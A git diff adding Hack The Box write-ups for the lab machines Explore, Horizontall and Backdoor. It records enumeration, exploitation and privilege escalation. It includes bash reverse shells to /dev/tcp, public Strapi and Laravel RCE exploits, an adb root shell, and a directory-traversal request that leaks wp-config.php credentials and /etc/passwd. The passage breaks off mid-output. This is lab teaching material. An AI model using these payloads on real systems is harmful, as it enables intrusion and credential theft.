+ PubkeyAcceptedAlgorithms +ssh-rsa
+ HostkeyAlgorithms +ssh-rsa
+ Port 2222
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → sshpub explore
+ The authenticity of host '[explore.htb]:2222 ([10.129.17.72]:2222)' can't be established.
+ RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
+ This key is not known by any other names.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '[explore.htb]:2222' (RSA) to the list of known hosts.
+ Password authentication
+ (kristi@explore.htb) Password:
+ :/ $ id
+ uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
+
+
+
+Once logged in, we find the user flag in the /sdcard directory:
+
+
+ :/ $ ls
+ acct init.superuser.rc sbin
+ bin init.usb.configfs.rc sdcard
+ bugreports init.usb.rc sepolicy
+ cache init.zygote32.rc storage
+ charger init.zygote64_32.rc sys
+ config lib system
+ d mnt ueventd.android_x86_64.rc
+ data odm ueventd.rc
+ default.prop oem vendor
+ dev plat_file_contexts vendor_file_contexts
+ etc plat_hwservice_contexts vendor_hwservice_contexts
+ fstab.android_x86_64 plat_property_contexts vendor_property_contexts
+ init plat_seapp_contexts vendor_seapp_contexts
+ init.android_x86_64.rc plat_service_contexts vendor_service_contexts
+ init.environ.rc proc vndservice_contexts
+ init.rc product
+ :/ $ cd sdcard/
+ :/sdcard $ ls
+ Alarms DCIM Movies Notifications Podcasts backups user.txt
+ Android Download Music Pictures Ringtones dianxinos
+ :/sdcard $ cat user.txt
+ f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we got the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc we look back at our nmap scan which picked up port 5555, and usually this port is used for the Android Debug Bridge, so let's try to connect to it:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → adb connect explore.htb:5555
+ * daemon not running; starting now at tcp:5037
+ * daemon started successfully
+ ^C
+
+
+
+Doesnt work, because usually adb is used when you want to debug an android phone locally, so let's port forward port 5555:
+
+
+ [term1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → sshpub -p 2222 -L 5555:localhost:5555 explore
+ Password authentication
+ (kristi@explore.htb) Password:
+ :/ $
+
+ [term2]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → adb connect 127.0.0.1:5555
+ connected to 127.0.0.1:5555
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → adb root
+ restarting adbd as root
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → adb shell
+ x86_64:/ # id
+ uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:su:s0
+ x86_64:/ # cat /data/root.txt
+ f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/68.md b/Easy/68.md
new file mode 100644
index 0000000..0ac4890
--- /dev/null
+++ b/Easy/68.md
@@ -0,0 +1,432 @@
+# Horizontall Writeup
+
+
+
+## Introduction :
+
+Horizontall is an easy Linux box released back in August 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → nmap -sCV -p- horizontall.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 15:08 UTC
+ Nmap scan report for horizontall.htb (10.129.17.82)
+ Host is up (0.13s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
+ | 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
+ |_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
+ 80/tcp open http nginx 1.14.0 (Ubuntu)
+ |_http-title: horizontall
+ |_http-server-header: nginx/1.14.0 (Ubuntu)
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 15.62 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+Trying to run gobuster on this site yields no results, so instead we look for other clues by intercepting the traffic with burpsuite:
+
+
+
+And here we found out that there was another domain we could use: **api-prod.horizontall.htb** so let's add it to our hosts file:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → cat /etc/hosts | grep horizontall
+ 10.129.17.82 horizontall.htb api-prod.horizontall.htb
+
+
+
+So let's browse to the api endpoint at **http://api-prod.horizontall.htb/reviews** :
+
+
+
+Then let's enumerate it with gobuster:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://api-prod.horizontall.htb
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://api-prod.horizontall.htb
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 15:47:07 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /reviews (Status: 200) [Size: 507]
+ /users (Status: 403) [Size: 60]
+ **/admin (Status: 200) [Size: 854]**
+ /Reviews (Status: 200) [Size: 507]
+ /Users (Status: 403) [Size: 60]
+
+
+
+/admin looks interesting, so let's investigate it:
+
+
+
+Here we have a strapi admin login webpage, so let's take a look at the available exploits for it:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → searchsploit strapi
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Strapi 3.0.0-beta - Set Password (Unauthenticated) | multiple/webapps/50237.py
+ Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) | multiple/webapps/50238.py
+ Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py
+ Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+Let's use the Unauthenticated exploit:
+
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → cp $(locate 50239.py) .
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → vim 50239.py
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → python3 50239.py http://api-prod.horizontall.htb/
+ [+] Checking Strapi CMS Version running
+ [+] Seems like the exploit will work!!!
+ [+] Executing exploit
+
+
+ [+] Password reset was successfully
+ [+] Your email is: admin@horizontall.htb
+ [+] Your new credentials are: admin:SuperStrongPassword1
+ [+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyMjQ1LCJleHAiOjE2NzE1NTQyNDV9.9bnkS2ZxD8V5_RR-urF403xy8g-VVYaeukmKEBBGCK4
+
+
+ $>
+
+
+
+This exploit basically resets the **admin@horizontall.htb** user's password to **SuperStrongPassword1** so once we ran it we can login:
+
+
+
+but the more interesting part is that we can execute code:
+
+
+ $> bash
+ [+] Triggering Remote code executin
+ [*] Rember this is a blind RCE don't expect to see output
+ id
+
+
+However as you can see it is a blind RCE, we can't see any output, so to counter that we're going to get a reverse shell instead:
+
+
+ [term 1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → nc -lvnp 9999
+
+ [term2]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → python3 50239.py http://api-prod.horizontall.htb/
+ [+] Checking Strapi CMS Version running
+ [+] Seems like the exploit will work!!!
+ [+] Executing exploit
+
+
+ [+] Password reset was successfully
+ [+] Your email is: admin@horizontall.htb
+ [+] Your new credentials are: admin:SuperStrongPassword1
+ [+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyNDc3LCJleHAiOjE2NzE1NTQ0Nzd9.5lNGdTyiV9d-ciGggW5Z5Y6OJNZPARJAWBtM41qxW7A
+
+
+ $> bash -c 'bash -i >& /dev/tcp/10.10.16.14/9999 0>&1'
+ [+] Triggering Remote code executin
+ [*] Rember this is a blind RCE don't expect to see output
+
+ [term1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → nc -lvnp 9999
+ Connection from 10.129.17.82:42004
+ bash: cannot set terminal process group (1975): Inappropriate ioctl for device
+ bash: no job control in this shell
+ strapi@horizontall:~/myapi$ id
+ id
+ uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
+ strapi@horizontall:~/myapi$
+
+
+
+Now that we got a reverse shell, let's upgrade it to a fully interactive tty:
+
+
+ strapi@horizontall:~/myapi$ which wget curl python python3
+ which wget curl python python3
+ /usr/bin/wget
+ /usr/bin/curl
+ /usr/bin/python
+ /usr/bin/python3
+
+ #spawn a TTY shell with python3:
+ strapi@horizontall:~/myapi$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+
+ #CTRL+Z to background the process
+ strapi@horizontall:~/myapi$ ^Z
+ [1] + 3112123 suspended nc -lvnp 9999
+
+ #stty raw it and then bring it back to the foreground:
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → stty raw -echo ; fg
+ [1] + 3112123 continued nc -lvnp 9999
+
+ #then set the TERM and SHELL env variables and the tty rows and colums:
+ strapi@horizontall:~/myapi$ export TERM=screen-256color
+ strapi@horizontall:~/myapi$ export SHELL=bash
+ strapi@horizontall:~/myapi$ stty rows 30 cols 200
+
+ #reset to refresh the terminal
+ strapi@horizontall:~/myapi$ reset
+
+
+
+Now that we have a fully interactive TTY reverse shell, we can go grab the user flag:
+
+
+ strapi@horizontall:~$ cd /home/
+ strapi@horizontall:/home$ ls
+ developer
+ strapi@horizontall:/home$ cd developer/
+ strapi@horizontall:/home/developer$ ls
+ composer-setup.php myproject user.txt
+ strapi@horizontall:/home/developer$ cat user.txt
+ fcXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now just like on the BountyHunter box, we use linpeas.sh to enumerate privesc paths:
+
+
+ [term1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → cp ../BountyHunter/linpeas.sh .
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ strapi@horizontall:/tmp$ wget http://10.10.16.14:9090/linpeas.sh
+
+ strapi@horizontall:/tmp$ chmod +x linpeas.sh
+ strapi@horizontall:/tmp$ ./linpeas.sh
+
+
+
+` 
+
+Now what's interesting here is the local port 8000:
+
+
+
+As it is written, it's a local port, so let's port forward it via SSH:
+
+
+ [term1]
+ strapi@horizontall:~$ mkdir .ssh
+ strapi@horizontall:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere' > .ssh/authorized_keys
+
+ [term2]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc
+ Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Sun Nov 20 17:04:40 UTC 2022
+
+ System load: 0.0 Processes: 183
+ Usage of /: 82.1% of 4.85GB Users logged in: 0
+ Memory usage: 45% IP address for eth0: 10.129.17.82
+ Swap usage: 0%
+
+
+ 0 updates can be applied immediately.
+
+ Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
+
+
+ Last login: Sun Nov 20 17:01:35 2022 from 10.10.16.14
+ $
+
+ [term3]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → nmap -sCV 127.0.0.1 -p 8000
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 17:05 UTC
+ Nmap scan report for localhost (127.0.0.1)
+ Host is up (0.000048s latency).
+
+ PORT STATE SERVICE VERSION
+ 8000/tcp open http (PHP 7.4.22)
+ | fingerprint-strings:
+ | FourOhFourRequest:
+ | HTTP/1.0 404 Not Found
+ | Date: Sun, 20 Nov 2022 17:05:31 GMT
+ | Connection: close
+ | X-Powered-By: PHP/7.4.22
+ | Cache-Control: no-cache, private
+ | date: Sun, 20 Nov 2022 17:05:31 GMT
+ | Content-type: text/html; charset=UTF-8
+ | <****!DOCTYPE html>
+ | <****html lang="en">
+ | <****head>
+ | <****meta charset="utf-8">
+ | <****meta name="viewport" content="width=device-width, initial-scale=1">
+ | <****title>Not Found <****/title>
+ | <****!-- Fonts -->
+ | <****link rel="preconnect" href="https://fonts.gstatic.com">
+ | <****link href="https://fonts.googleapis.com/css2?family=Nunito &display;=swap" rel="stylesheet">
+ | <****style>
+ | normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-app
+ | GetRequest:
+ | HTTP/1.0 200 OK
+ | Date: Sun, 20 Nov 2022 17:05:26 GMT
+ | Connection: close
+ | X-Powered-By: PHP/7.4.22
+ | Content-Type: text/html; charset=UTF-8
+ | Cache-Control: private, must-revalidate
+ | Date: Sun, 20 Nov 2022 17:05:26 GMT
+ | pragma: no-cache
+ | expires: -1
+ | Set-Cookie: XSRF-TOKEN=eyJpdiI6InJ6Rjhhc0RMR3E0d242U0NrNzNzQ3c9PSIsInZhbHVlIjoiSWNaeGhCZitFTURXR2VlM005QmdsVm5BNFk2cThPN0g1OEJvTi9iUFYyNEpHQWJMZTJuTmtPVGZla3NwbFl5NkhNRHF4ajRBTFFoYzJaL2FCK2pocVkyMTIwVHBqeWRieU1zQWE4S095T1dOTG1rWkZURGF2RnVteTlmdTJ0S0MiLCJtYWMiOiIxZDM2ODdjZjExMmQxYzY4M2Y3ZjZiN2JlYjk2NzNkMWE0YTJkMGExOTkxZjAyZDE4ZDNjMzVjNmI3NTQ0NjdhIn0%3D; expires=Sun, 20-Nov-2022 19:05:26 GMT; Max-Age=7200; path=/; samesite=lax
+ |_ Set-Cookie: laravel_session=eyJpdiI6IkhtTlZjUnBzZ2RkSDNZMGNhNjA5bWc9PSIsInZhbHVlIjoiYXY0QlozV004N2pydDZ5MVJ2QnJ2RmRnZUYrWVdQR0l4VWVJWmhaMFdpSXFITDdrVnNzYzF4RGhFZlkxczlmSEtaQkFrUDlLcVVXQlBiOTh3U3FxclpoVGxpaDNZMzkvSXhreEZON3
+
+After port-forwarding the port 8000 we see it's a laravel webserver:
+
+
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://127.0.0.1:8000
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://127.0.0.1:8000
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 17:12:29 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /profiles (Status: 500) [Size: 616204]
+
+
+
+gobuster found /profiles so let's investigate it:
+
+
+
+So we know that there's a laravel 8 website on port 8000, and where it is located on the machine thanks to the error we're seeing in /profiles, so let's look for exploits:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → while true ; do sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc ; done
+
+ #since the ssh port forwarding keeps dying, run it like that ^
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → searchsploit laravel 8
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection | php/webapps/50538.txt
+ Laravel - 'Hash::make()' Password Truncation Security | multiple/remote/39318.txt
+ **Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py**
+ Laravel Log Viewer <****0.13.0 - Local File Download | php/webapps/44343.py
+ Laravel Nova 3.7.0 - 'range' DoS | php/webapps/49198.txt
+ PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) | php/webapps/50525.txt
+ PHP Laravel Framework 5.5.40 / 5.6.x <****5.6.30 - token Unserialize Remote Command Executi | linux/remote/47129.rb
+ UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read | php/webapps/48166.txt
+ UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload | php/webapps/46389.py
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+Let's take a look at the RCE one:
+
+
+ [term1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → python 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'bash -c "(bash -i &>/dev/tcp/10.10.16.14/4444 0>&1)&"'
+
+ Exploit...
+
+ [term2]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → nc -lvnp 4444
+
+ Connection from 10.129.17.82:33968
+ bash: cannot set terminal process group (27737): Inappropriate ioctl for device
+ bash: no job control in this shell
+ root@horizontall:/home/developer/myproject/public#
+ root@horizontall:/home/developer/myproject/public# id
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@horizontall:/home/developer/myproject/public# cd
+ cd
+ root@horizontall:~# cat root.txt
+ cat root.txt
+ bdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/69.md b/Easy/69.md
new file mode 100644
index 0000000..58e5935
--- /dev/null
+++ b/Easy/69.md
@@ -0,0 +1,435 @@
+# Backdoor Writeup
+
+
+
+## Introduction :
+
+Backdoor is an easy Linux box released back in November 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → nmap -sCV backdoor.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 20:11 UTC
+ Nmap scan report for backdoor.htb (10.129.96.68)
+ Host is up (0.068s latency).
+ Not shown: 998 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
+ | 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
+ |_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Backdoor - Real-Life
+ |_http-generator: WordPress 5.8.1
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://backdoor.htb
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://backdoor.htb
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 20:12:34 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /wp-content (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
+ /wp-includes (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
+ /wp-admin (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]
+ Progress: 50259 / 220561 (22.79%)^C
+ [!] Keyboard interrupt detected, terminating.
+ ===============================================================
+ 2022/11/20 20:13:26 Finished
+ ===============================================================
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://backdoor.htb/wp-content/
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://backdoor.htb/wp-content/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 20:13:30 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /themes (Status: 301) [Size: 324] [--> http://backdoor.htb/wp-content/themes/]
+ /uploads (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/uploads/]
+ /plugins (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/plugins/]
+ /upgrade (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/upgrade/]
+ Progress: 3928 / 220561 (1.78%)^C
+ [!] Keyboard interrupt detected, terminating.
+ ===============================================================
+ 2022/11/20 20:13:33 Finished
+ ===============================================================
+
+
+
+` 
+
+So thanks to Gobuster we found the /wp-content/plugins/ebook-download/ subdirectory:
+
+
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → searchsploit ebook plugin
+ ----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
+ Facebook Profile MyBB Plugin 2.4 - Persistent Cross-Site Scripting | php/webapps/23355.txt
+ WordPress Plugin eBook Download 1.1 - Directory Traversal | php/webapps/39575.txt
+ WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection | php/webapps/17773.txt
+ WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection | php/webapps/17737.txt
+ WordPress Plugin Facebook Survey 1.0 - SQL Injection | php/webapps/22853.txt
+ WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting | php/webapps/36383.txt
+ WordPress Plugin Nextend Facebook Connect 1.4.59 - Cross-Site Scripting | php/webapps/35439.txt
+ WordPress Plugin Spider Facebook - 'facebook.php' SQL Injection | php/webapps/39300.txt
+ ----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → cat $(locate 39575.txt)
+ # Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
+ # Exploit Author: Wadeek
+ # Website Author: https://github.com/Wad-Deek
+ # Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
+ # Version: 1.1
+ # Tested on: Xampp on Windows7
+
+ [Version Disclosure]
+ ======================================
+ http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
+ ======================================
+
+ [PoC]
+ ======================================
+ /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
+ ======================================%
+
+
+
+Apparently there is a Directory traversal vulnerability, so let's test it out:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → wget http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php\?ebookdownloadurl\=../../../wp-config.php -O wp-config.php
+ --2022-11-20 20:35:12-- http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
+ Resolving backdoor.htb (backdoor.htb)... 10.129.96.68
+ Connecting to backdoor.htb (backdoor.htb)|10.129.96.68|:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 3866 (3.8K) [application/octet-stream]
+ Saving to: ‘wp-config.php’
+
+ wp-config.php 100%[=========================================================================================================>] 3.78K --.-KB/s in 0.03s
+
+ 2022-11-20 20:35:12 (126 KB/s) - ‘wp-config.php’ saved [3866/3866]
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → cat wp-config.php
+ ../../../wp-config.php../../../wp-config.php../../../wp-config.php<****?php
+ /**
+ * The base configuration for WordPress
+ *
+ * The wp-config.php creation script uses this file during the installation.
+ * You don't have to use the web site, you can copy this file to "wp-config.php"
+ * and fill in the values.
+ *
+ * This file contains the following configurations:
+ *
+ * * MySQL settings
+ * * Secret keys
+ * * Database table prefix
+ * * ABSPATH
+ *
+ * @link https://wordpress.org/support/article/editing-wp-config-php/
+ *
+ * @package WordPress
+ */
+
+ // ** MySQL settings - You can get this info from your web host ** //
+ /** The name of the database for WordPress */
+ define( 'DB_NAME', 'wordpress' );
+
+ /** MySQL database username */
+ define( 'DB_USER', 'wordpressuser' );
+
+ /** MySQL database password */
+ define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
+
+ [...]
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php\?ebookdownloadurl\=../../../../../../etc/passwd
+ ../../../../../../etc/passwd../../../../../../etc/passwd../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
